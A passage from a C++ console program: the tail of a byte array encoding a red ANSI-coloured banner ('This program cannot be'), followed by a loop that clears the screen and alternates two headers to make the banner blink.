0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x4c, 0x2e, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6f, 0x67, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f, 0x74, 0x20, 0x62, 0x65, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x00 };
160 | 
161 |     int i{ 0 };
162 | 
163 |     for (i = 0; i < 3; ++i) {
164 |         system("cls");
165 |         cout << header1;
166 |         Sleep(1000);
167 |         system("cls");
168 |         cout << header2;
169 |         Sleep(1000);
170 |     }
171 | }
172 | 


--------------------------------------------------------------------------------